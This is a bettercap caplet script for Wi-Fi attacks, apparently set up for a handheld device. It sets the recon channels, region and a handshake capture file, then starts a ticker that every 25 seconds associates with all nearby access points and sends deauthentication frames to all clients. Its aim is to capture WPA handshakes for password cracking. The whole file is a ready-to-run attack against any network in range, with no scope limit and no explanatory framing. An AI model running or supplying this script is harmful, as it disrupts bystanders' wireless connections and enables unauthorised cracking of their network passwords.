#### SET ##################################################################################
# set gps.device localhost:2947
set wifi.handshakes.file /sd/LEET/handshakes/PW-NA-GO-TC-HI-00_full.pcap
set wifi.recon.channel clear 
set wifi.hop.period 250
# set wifi.recon.channel 1,2,3,4,5,6,7,8,9,11,12
# set wifi.recon.channel 32,36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140
# set wifi.recon.channel 1,2,3,4,5,6,7,8,9,11,12,32,36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140
set wifi.region BR
set wifi.assoc.skip 00:C0:CA:8D:99:6D
set wifi.deauth.skip 00:C0:CA:8D:99:6D
set ticker.period 25
set ticker.commands wifi.assoc all; sleep 10; wifi.deauth all
#### RUN ##################################################################################
# gps on
# sleep 5
wifi.recon on
sleep 5
ticker on
events.ignore wifi.client.probe
events.clear
events.stream off
